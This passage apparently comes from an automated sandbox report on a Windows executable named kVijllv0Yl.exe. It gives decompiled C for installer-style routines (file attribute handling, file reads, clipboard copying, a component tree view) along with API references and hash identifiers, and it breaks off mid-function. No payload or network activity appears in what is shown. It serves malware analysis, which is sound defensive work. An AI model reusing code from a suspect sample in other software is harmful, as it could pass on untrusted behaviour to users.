                  0x00000000

                  APIs
                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                  • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: MessageSend
                  • String ID:
                  • API String ID: 3850602802-0
                  • Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                  • Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
                  • Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                  • Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040575C Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 68%
                  			E0040575C(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                  0x00405760
                  0x0040576d
                  0x00405782
                  0x00405788

                  APIs
                  • GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\kVijllv0Yl.exe,80000000,00000003), ref: 00405760
                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: File$AttributesCreate
                  • String ID:
                  • API String ID: 415043291-0
                  • Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                  • Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
                  • Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                  • Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040573D Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040573D(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}




                  0x00405741
                  0x0040574a
                  0x00000000
                  0x00405753
                  0x00405759

                  APIs
                  • GetFileAttributesA.KERNELBASE(?,00405548,?,?,?), ref: 00405741
                  • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405753
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                  • Instruction ID: 88d4634cff9a4ddd1fee40d2dea465eb4d792ab4199cb35d7d0d1e1f6e6e1bf9
                  • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                  • Instruction Fuzzy Hash: CAC04CB1808501EBD6016B24DF0D81F7B66EB50321B108B35F569E00F0C7755C66EA1A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004031A8 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004031A8(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                  0x004031ac
                  0x004031bf
                  0x004031c7
                  0x00000000
                  0x004031ce
                  0x00000000
                  0x004031d0

                  APIs
                  • ReadFile.KERNELBASE(00409128,00000000,00000000,00000000,00413038,0040B038,004030AD,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000), ref: 004031BF
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: FileRead
                  • String ID:
                  • API String ID: 2738559852-0
                  • Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                  • Instruction ID: b8f1ad64850fa721b7c3123cc302f733781f6218d307da9d2aa6486ecc23217a
                  • Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                  • Instruction Fuzzy Hash: 4BE08632254119BBCF105E619C00AD73F5CEB0A3A2F008432FD55E9190D230EA11DBA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004031DA Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004031DA(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
				return _t2;
			}




                  0x004031e8
                  0x004031ee

                  APIs
                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,?), ref: 004031E8
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: FilePointer
                  • String ID:
                  • API String ID: 973152223-0
                  • Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                  • Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
                  • Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                  • Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Function 00404F61 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 95%
                  			E00404F61(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				int _t94;
				int _t95;
				void* _t101;
				intOrPtr _t112;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423684;
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404EF5, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b || _a12 != _t154) {
								goto L20;
							} else {
								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
								_a8 = _t87;
								if(_t87 <= _t149) {
									L37:
									return 0;
								}
								_t160 = CreatePopupMenu();
								AppendMenuA(_t160, _t149, 1, E00405AA7(_t149, _t154, _t160, _t149, 0xffffffe1));
								_t92 = _a16;
								if(_t92 != 0xffffffff) {
									_t150 = _t92;
									_t94 = _t92 >> 0x10;
								} else {
									GetWindowRect(_t154,  &_v28);
									_t150 = _v28.left;
									_t94 = _v28.top;
								}
								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
								_t162 = 1;
								if(_t95 == 1) {
									_v60 = _t149;
									_v48 = 0x420498;
									_v44 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
									} while (_a4 != _t149);
									OpenClipboard(_t149);
									EmptyClipboard();
									_t101 = GlobalAlloc(0x42, _t162);
									_a4 = _t101;
									_t163 = GlobalLock(_t101);
									do {
										_v48 = _t163;
										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
										 *_t164 = 0xa0d;
										_t163 = _t164 + 2;
										_t149 = _t149 + 1;
									} while (_t149 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L37;
							}
						}
						if( *0x42366c == _t149) {
							ShowWindow( *0x423ea8, 8);
							if( *0x423f2c == _t149) {
								_t112 =  *0x41fc68; // 0x0
								E00404E23( *((intOrPtr*)(_t112 + 0x34)), _t149);
							}
							E00403E10(1);
							goto L25;
						}
						 *0x41f860 = 2;
						E00403E10(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00403E9E(_a8, _a12, _a16);
						}
						ShowWindow( *0x423670, _t149);
						ShowWindow(_t154, 8);
						E00403E6C(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423eb0;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423670 = GetDlgItem(_a4, 0x403);
				 *0x423668 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423684 = _t127;
				_v8 = _t127;
				E00403E6C( *0x423670);
				 *0x423674 = E004046C5(4);
				 *0x42368c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403E37(_a4);
				if(( *0x423eb8 & 0x00000003) != 0) {
					ShowWindow( *0x423670, _t149);
					if(( *0x423eb8 & 0x00000002) != 0) {
						 *0x423670 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403E6C( *0x423668);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423eb8 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}

































                  0x00404f6a
                  0x00404f70
                  0x00404f79
                  0x00404f7c
                  0x00405114
                  0x00405138
                  0x00405138
                  0x0040514b
                  0x00405169
                  0x00405170
                  0x004051c7
                  0x004051cb
                  0x00000000
                  0x004051d2
                  0x004051da
                  0x004051e2
                  0x004051e5
                  0x004052de
                  0x00000000
                  0x004052de
                  0x004051f4
                  0x00405200
                  0x00405206
                  0x0040520c
                  0x00405221
                  0x00405227
                  0x0040520e
                  0x00405213
                  0x00405219
                  0x0040521c
                  0x0040521c
                  0x00405237
                  0x0040523f
                  0x00405242
                  0x0040524b
                  0x0040524e
                  0x00405255
                  0x0040525c
                  0x00405264
                  0x00405264
                  0x0040527b
                  0x0040527b
                  0x00405282
                  0x00405288
                  0x00405291
                  0x00405298
                  0x004052a1
                  0x004052a3
                  0x004052a6
                  0x004052b5
                  0x004052b7
                  0x004052bd
                  0x004052be
                  0x004052bf
                  0x004052c7
                  0x004052d2
                  0x004052d8
                  0x004052d8
                  0x00000000
                  0x00405242
                  0x004051cb
                  0x00405178
                  0x004051a8
                  0x004051b0
                  0x004051b2
                  0x004051bb
                  0x004051bb
                  0x004051c2
                  0x00000000
                  0x004051c2
                  0x0040517c
                  0x00405186
                  0x00000000
                  0x0040514d
                  0x00405153
                  0x0040518b
                  0x00000000
                  0x00405194
                  0x0040515c
                  0x00405161
                  0x00405164
                  0x00000000
                  0x00405164
                  0x0040514b
                  0x00404f82
                  0x00404f86
                  0x00404f8f
                  0x00404f96
                  0x00404f99
                  0x00404f9c
                  0x00404f9f
                  0x00404fa0
                  0x00404fa1
                  0x00404fba
                  0x00404fbd
                  0x00404fc7
                  0x00404fd6
                  0x00404fde
                  0x00404fe6
                  0x00404feb
                  0x00404fee
                  0x00404ffa
                  0x00405003
                  0x0040500c
                  0x0040502f
                  0x00405035
                  0x00405046
                  0x0040504b
                  0x00405059
                  0x00405067
                  0x00405067
                  0x0040506c
                  0x0040507a
                  0x0040507a
                  0x0040507f
                  0x00405082
                  0x00405087
                  0x00405093
                  0x0040509c
                  0x004050a9
                  0x004050b8
                  0x004050ab
                  0x004050b0
                  0x004050b0
                  0x004050c4
                  0x004050c4
                  0x004050d8
                  0x004050e1
                  0x004050ea
                  0x004050fa
                  0x00405106
                  0x00405106
                  0x00000000

                  APIs
                  • GetDlgItem.USER32 ref: 00404FC0
                  • GetDlgItem.USER32 ref: 00404FCF
                  • GetClientRect.USER32 ref: 0040500C
                  • GetSystemMetrics.USER32 ref: 00405014
                  • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405035
                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405046
                  • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00405059
                  • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00405067
                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040507A
                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040509C
                  • ShowWindow.USER32(?,00000008), ref: 004050B0
                  • GetDlgItem.USER32 ref: 004050D1
                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004050E1
                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004050FA
                  • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405106
                  • GetDlgItem.USER32 ref: 00404FDE
                    • Part of subcall function 00403E6C: SendMessageA.USER32(00000028,?,00000001,00403C9D), ref: 00403E7A
                  • GetDlgItem.USER32 ref: 00405123
                  • CreateThread.KERNEL32 ref: 00405131
                  • CloseHandle.KERNEL32(00000000), ref: 00405138
                  • ShowWindow.USER32(00000000), ref: 0040515C
                  • ShowWindow.USER32(?,00000008), ref: 00405161
                  • ShowWindow.USER32(00000008), ref: 004051A8
                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051DA
                  • CreatePopupMenu.USER32 ref: 004051EB
                  • AppendMenuA.USER32 ref: 00405200
                  • GetWindowRect.USER32 ref: 00405213
                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405237
                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405272
                  • OpenClipboard.USER32(00000000), ref: 00405282
                  • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405288
                  • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405291
                  • GlobalLock.KERNEL32 ref: 0040529B
                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052AF
                  • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004052C7
                  • SetClipboardData.USER32 ref: 004052D2
                  • CloseClipboard.USER32 ref: 004052D8
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                  • String ID: {
                  • API String ID: 590372296-366298937
                  • Opcode ID: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
                  • Instruction ID: fc5da488f7bc2ad647f0a41a3fd7729356532ad04293fc61f6ec29e3deb516b2
                  • Opcode Fuzzy Hash: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
                  • Instruction Fuzzy Hash: 94A14B70900208BFDB219F60DD89AAE7F79FB08355F10417AFA04BA2A0C7795E41DF69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00404772 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
                  Download Yara Rule
                  C-Code - Quality: 97%
                  			E00404772(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423ec8;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x423eb0 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x423eb9 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E004046F2(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x423eb8) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x420474;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x42048c;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x420474 = _t315;
								 *0x42048c = _t315;
								 *0x423f00 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x423eb9 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E0040140B(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x42048c;
									_t196 =  *0x423ec8;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x423ecc <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x42367c + 0x10)) != _t315) {
											E00404610(0x3ff, 0xfffffffb, E004046C5(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x423ecc);
									goto L84;
								} else {
									_t282 = E004012E2( *0x42048c);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x423f00 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42048c = GlobalAlloc(0x40,  *0x423ecc << 2);
					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
					 *0x420480 =  *0x420480 | 0xffffffff;
					_v24 = _t250;
					 *0x420488 = SetWindowLongA(_v8, 0xfffffffc, E00404D73);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x420474 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x420474);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405AA7(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403E37(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403E37(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x423ecc <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
